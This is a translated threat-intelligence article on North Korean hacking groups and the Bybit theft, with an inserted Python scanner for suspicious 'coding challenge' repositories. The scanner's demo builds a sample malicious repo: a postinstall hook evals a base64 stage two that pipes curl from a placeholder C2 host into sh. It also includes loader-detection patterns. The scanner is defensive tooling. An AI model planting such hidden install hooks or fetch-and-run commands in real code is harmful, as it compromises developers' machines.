Paradigm: Unveiling the Threat of North Korean Hacker Group Lazarus Group

Foresight News
2025-04-02 09:49:40
Discussing the mastermind behind the Bybit theft, the Lazarus Group, from the perspectives of organizational structure, attack methods, and prevention strategies.

Original Title: "Demystifying the North Korean Threat"

Author: samczsun, Paradigm Research Partner

Compiled by: Bright, Foresight News

On a February morning, the SEAL 911 chat lit up as we watched in confusion while Bybit moved over $1 billion worth of tokens out of its cold wallet into a brand-new address, then quickly began liquidating over $200 million in LSTs. Within minutes, we confirmed with the Bybit team and through independent analysis (the multisig had previously used the publicly verified Safe Wallet contracts and was now using a freshly deployed, unverified one) that this was not routine maintenance. Someone had pulled off the largest hack in cryptocurrency history, and we had front-row seats.

While some team members (and the broader intelligence community) began tracing the funds and notifying partner exchanges, others tried to work out exactly what had happened and whether other funds were at risk. Fortunately, identifying the perpetrator was easy: in recent years, only one known threat actor has successfully stolen billions of dollars from cryptocurrency exchanges, North Korea, also known as the DPRK.

Beyond that, however, we had very few leads. North Korean operators are careful and skilled at covering their tracks, so it is hard not only to determine the root cause of a breach but even to know which specific team within North Korea is responsible. The one piece of intelligence we could rely on was that North Korea prefers to get into cryptocurrency exchanges through social engineering. We therefore speculated that North Korea had compromised Bybit's multisig signers and deployed malware to interfere with the signing process.

That speculation turned out to be completely wrong. Days later, we learned that North Korea had in fact compromised Safe Wallet's own infrastructure and deployed a malicious payload aimed specifically at Bybit. This level of sophistication was something nobody had considered or prepared for, and it calls into question many of the security models in use across the industry.

North Korean hackers pose an increasingly serious threat to our industry, and we cannot defeat an enemy we do not understand or comprehend. There are numerous documented incidents and articles regarding various aspects of North Korea's cyber operations, but piecing them together is challenging. I hope this overview provides a more comprehensive understanding of how North Korea operates, their strategies and procedures, making it easier for us to implement the right mitigation measures.

Organizational Structure

Perhaps the first thing to clear up is how to categorize and name the vast array of North Korean cyber activity. While "Lazarus Group" is acceptable as colloquial shorthand, more precise terminology helps when discussing North Korea's systemic cyber threat in detail.

First, it helps to understand North Korea's "org chart." At the top sits the country's ruling (and only) party, the Workers' Party of Korea (WPK), which oversees every government body in North Korea, including the Korean People's Army (KPA) and the Central Committee. Within the KPA is the General Staff Department (GSD), home to the Reconnaissance General Bureau (RGB). The Munitions Industry Department (MID) reports to the Central Committee.

The RGB is responsible for almost all of North Korea's cyber operations, including nearly everything North Korea has been observed doing in the cryptocurrency industry. Besides the notorious Lazarus Group, threat actors traced to the RGB include AppleJeus, APT38, DangerousPassword, and TraderTraitor. The MID, by contrast, runs North Korea's nuclear and ballistic missile programs and is the primary source of the North Korean IT workers that the intelligence community tracks as Contagious Interview and Wagemole.

Lazarus Group

The Lazarus Group is a highly sophisticated hacking organization; cybersecurity experts attribute some of the largest and most destructive cyberattacks in history to it. Novetta first identified the Lazarus Group in 2016 while analyzing the Sony Pictures Entertainment hack.

In 2014, Sony was producing the action comedy "The Interview," which prominently featured the humiliation and eventual assassination of Kim Jong-un. Understandably, the North Korean regime did not take this well, and it retaliated by hacking Sony's network, stealing several terabytes of data, leaking hundreds of gigabytes of confidential or sensitive information, and wiping the originals. As then-CEO Michael Lynton put it, "The people who do this not only steal everything in the house, they burn the house down." Sony's investigation and remediation costs from the attack came to at least $15 million, and the true losses may have been higher.

Then, in 2016, a hack bearing remarkable similarities to Lazarus Group operations targeted Bangladesh Bank, aiming to steal nearly $1 billion. Over the course of a year, the attackers socially engineered Bangladesh Bank employees, eventually gaining remote access and moving laterally through the bank's internal network until they reached the computers that interacted with the SWIFT network. From there, they waited for the perfect moment: Bangladesh Bank's weekend begins on Thursday evening, while the Federal Reserve Bank of New York's begins on Friday evening. On Thursday evening local time, the threat actors used their SWIFT access to send 36 separate transfer requests to the New York Fed, which were forwarded to Rizal Commercial Banking Corporation (RCBC) in the Philippines over the next 24 hours. When Bangladesh Bank reopened, it discovered the hack and tried to notify RCBC to stop the pending transactions, only to find that RCBC was closed for the Lunar New Year holiday.

Finally, in 2017, the massive WannaCry 2.0 ransomware outbreak crippled industries worldwide, and part of the blame was attributed to the Lazarus Group. WannaCry is estimated to have caused billions of dollars in damage. It spread using EternalBlue, an exploit for a Windows SMB vulnerability that was originally developed by the NSA and later leaked by the Shadow Brokers; Microsoft had patched the flaw (MS17-010) two months before the outbreak, so it was not a zero-day by then, but unpatched machines were everywhere. The worm encrypted each infected device and propagated to any other reachable machine, ultimately infecting hundreds of thousands of devices worldwide. Fortunately, security researcher Marcus Hutchins found and activated a kill switch within about eight hours, which contained the final losses.

Throughout its history, the Lazarus Group has demonstrated strong technical capability and execution, and one of its goals is to generate revenue for the North Korean regime. It was therefore only a matter of time before it turned its attention to the cryptocurrency industry.

Offshoots

Over time, as "Lazarus Group" became the media's preferred shorthand for all North Korean cyber activity, the cybersecurity industry coined more precise names for specific clusters of Lazarus Group and North Korean activity. APT38 is one example: it split off from the Lazarus Group around 2016 to focus on financial crime, initially targeting banks (such as Bangladesh Bank) and later cryptocurrency. Then, in 2018, a new threat tracked as AppleJeus was found spreading malware aimed at cryptocurrency users. And as early as 2018, when OFAC first announced sanctions against two shell companies used by North Koreans, North Korean individuals posing as IT workers had already infiltrated the tech industry.

North Korean IT Workers

Although the earliest records of North Korean IT workers go back to the 2018 OFAC sanctions, Unit 42's 2023 report provided far more detail and identified two distinct threat actors: Contagious Interview and Wagemole.

Contagious Interview reportedly impersonates recruiters from well-known companies to lure developers into fake interview processes. Candidates are then instructed to clone a repository for local debugging, ostensibly as a coding challenge; in reality the repository contains a backdoor that, when executed, hands control of the affected machine to the attacker. This activity is ongoing, with the most recent record dated August 11, 2024.
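The following script is an added example for this page (it is not code from the article or from Unit 42's report) showing a triage pass a developer can run over a cloned "challenge" repository before installing or executing anything in it. It looks for the two things such a backdoor needs: a hook that runs code without the developer deliberately calling it (npm lifecycle scripts, hidden paths) and a loader that hides its payload (eval of decoded data, long base64 blobs, child_process). The sample repository it scans and the indicator labels are constructed for illustration; this is a heuristic, so a clean result still does not justify running unknown code outside a disposable VM.

```python
"""Pre-execution triage of a cloned "coding challenge" repository.
Added example (not from the article or any vendor report). Heuristic only."""
import base64
import json
import os
import re
import tempfile

# package.json script names that npm/yarn/pnpm execute automatically on install.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
SAFE_HIDDEN = {".gitignore", ".gitattributes", ".editorconfig"}
SOURCE_EXT = {".js", ".ts", ".mjs", ".cjs", ".json", ".py", ".sh"}

# Loader patterns. The labels are our own, not any scanner's taxonomy.
INDICATORS = {
    "eval_of_decoded": re.compile(r"eval\s*\(\s*(?:atob|Buffer\.from|base64|unescape)", re.I),
    "child_process": re.compile(r"child_process|\b(?:exec|spawn)(?:Sync)?\s*\(", re.I),
    "new_function": re.compile(r"new\s+Function\s*\("),
    "python_exec": re.compile(r"\b(?:exec|eval)\s*\(\s*(?:base64|__import__|compile)"),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


def _match_indicators(text, rel, prefix=""):
    return [(rel, prefix + kind) for kind, rx in INDICATORS.items() if rx.search(text)]


def _scan_text(text, rel):
    hits = _match_indicators(text, rel)
    # A long base64 literal is usually a second stage: decode it and scan the plaintext too.
    for blob in INDICATORS["base64_blob"].findall(text):
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "ignore")
        except ValueError:
            continue
        hits += _match_indicators(decoded, rel, prefix="decoded:")
    return hits


def _scan_package_json(path, rel):
    try:
        with open(path, encoding="utf-8") as f:
            scripts = json.load(f).get("scripts", {})
    except (ValueError, OSError, AttributeError):
        return [(rel, "unparseable_package_json")]
    return [(rel, "lifecycle_script:" + name) for name in scripts if name in NPM_LIFECYCLE]


def scan_repo(root):
    """Walk the checkout and return (relative_path, finding) pairs."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]  # git's own objects are noise here
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if any(p.startswith(".") for p in rel.split("/")) and name not in SAFE_HIDDEN:
                findings.append((rel, "hidden_path"))
            if name == "package.json":
                findings += _scan_package_json(path, rel)
            if os.path.splitext(name)[1] in SOURCE_EXT:
                with open(path, encoding="utf-8", errors="ignore") as f:
                    findings += _scan_text(f.read(), rel)
    return findings


def build_sample_repo(root):
    """Constructed sample, not a real artefact: a benign-looking challenge whose
    postinstall hook runs a hidden loader that evals a base64-encoded stage two."""
    stage2 = ("require('child_process').exec('curl -s http://c2.invalid/stage2 | sh');"
              " // " + "x" * 180)
    blob = base64.b64encode(stage2.encode()).decode()
    files = {
        "package.json": json.dumps({
            "name": "coding-challenge", "version": "1.0.0",
            "scripts": {"test": "node test.js", "postinstall": "node ./.config/setup.js"},
        }, indent=2),
        ".config/setup.js": 'eval(Buffer.from("%s", "base64").toString());\n' % blob,
        "src/index.js": "module.exports = (a, b) => a + b;\n",
        "test.js": "const add = require('./src/index.js');\nconsole.log(add(1, 2));\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)


def demo():
    """Build the sample repo in a temp dir, scan it, and return the sorted findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_repo(root)
        return sorted(scan_repo(root))


if __name__ == "__main__":
    for rel, kind in demo():
        print(f"{kind:30s} {rel}")
```

Point `scan_repo` at a real checkout instead of the sample; any lifecycle script, hidden path or decoded payload hit means the repository should only ever be opened inside a throwaway VM, with no access to wallets, SSH keys or session cookies.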

Wagemole operatives, on the other hand, are not primarily trying to hire potential victims but to be hired by companies, where they work as ordinary (if perhaps not very productive) engineers. That said, there are records of IT workers using their access for attacks, such as the Munchables incident, in which an employee linked to North Korean activity used privileged access to the smart contracts to steal all of the assets.

Wagemole operatives vary in sophistication, from generic resume templates and a reluctance to join video calls to highly customized resumes, deepfaked video interviews, and forged identification documents such as driver's licenses and utility bills. In some cases, operatives have been embedded in a victim organization for up to a year before using their access to breach other systems and/or cash out entirely.

AppleJeus

AppleJeus focuses primarily on spreading malware and excels at elaborate supply chain attacks. In 2023, the 3CX supply chain attack put the more than 12 million users of 3CX's VoIP software at risk of infection; it later emerged that 3CX itself had been compromised through a supply chain attack on one of its own upstream suppliers, Trading Technologies.

In the cryptocurrency industry, AppleJeus initially spread malware packaged as legitimate software such as trading applications or cryptocurrency wallets. Over time, however, its approach evolved. In October 2024, Radiant Capital was compromised by malware delivered over Telegram by a threat actor impersonating a trusted contractor, an intrusion Mandiant attributed to AppleJeus.

Dangerous Password

Dangerous Password is responsible for low-sophistication, social-engineering-driven attacks on the cryptocurrency industry. As early as 2019, JPCERT/CC documented Dangerous Password sending phishing emails with enticing attachments for victims to download. In subsequent years, Dangerous Password sent phishing emails impersonating industry figures, with subject lines such as "Stablecoins and Crypto Assets Are Highly Risky."

Today, Dangerous Password still sends phishing emails but has also expanded to other platforms. For example, Radiant Capital reported receiving a phishing message over Telegram from someone impersonating a security researcher, which delivered a file named "PenpieHackingAnalysis_Report.zip." Users have also reported being contacted by people posing as journalists and investors who ask to schedule a call on an obscure video conferencing application. Much like Zoom, these applications download a one-time installer, except that when run, the installer drops malware on the device.

TraderTraitor

TraderTraitor is the most sophisticated North Korean threat actor targeting the cryptocurrency industry and has carried out attacks on Axie Infinity and Rain.com, among others. TraderTraitor almost exclusively targets exchanges and other companies with large reserves. It does not deploy zero-day vulnerabilities against its targets; instead it relies on highly refined spear-phishing. In the Axie Infinity hack, TraderTraitor contacted a senior engineer on LinkedIn, persuaded them to go through a series of interviews, and then sent a job "offer" document that delivered malware.

Later, in the WazirX hack, TraderTraitor compromised an as-yet-unidentified component of the signing pipeline and drained the exchange's hot wallet through repeated deposits and withdrawals, which led WazirX engineers to rebalance funds from cold wallets into the hot wallet. When the engineers went to sign the transfer, they were tricked into signing a transaction that handed control of the cold wallet to TraderTraitor.

This is strikingly similar to the February 2025 attack on Bybit, in which TraderTraitor first compromised Safe{Wallet}'s infrastructure through social engineering and then deployed malicious JavaScript that targeted Bybit's cold wallet front end specifically. When Bybit went to rebalance its wallets, the malicious code activated and caused Bybit's engineers to sign a transaction that handed control of the cold wallet to TraderTraitor.

Stay Safe

North Korea has demonstrated the ability to deploy zero-day vulnerabilities against its adversaries, but there are currently no records or known incidents of North Korea using zero-days against the cryptocurrency industry. Standard security advice therefore applies to almost all North Korean threats.

For individuals, use common sense and stay alert to social engineering. If someone claims to have highly confidential information and offers to share it with you, proceed with caution. If someone pressures you to download and run software right now, consider whether they are trying to put you in a position where you cannot think clearly.

For organizations, apply the principle of least privilege wherever possible. Minimize the number of people with access to sensitive systems and make sure they use password managers and 2FA. Keep personal and work devices separate, and install Mobile Device Management (MDM) and Endpoint Detection and Response (EDR) software on work devices, for protection before a breach and for visibility after one.

Unfortunately, for large exchanges and other high-value targets, TraderTraitor can do serious damage even without zero-days. Such organizations therefore need additional precautions that eliminate single points of failure, so that one compromised person, device or service cannot on its own result in a total loss of funds.

Even when everything else fails, there is still hope. The FBI has a dedicated team that tracks and disrupts North Korean intrusions and has been notifying victims for years. Recently, I was pleased to help the team's agents get in touch with potential North Korean targets. So, to be prepared for the worst, make sure you have publicly available contact information or are connected to enough people in the ecosystem (such as SEAL 911) that a message traversing the social graph can reach you as quickly as possible.
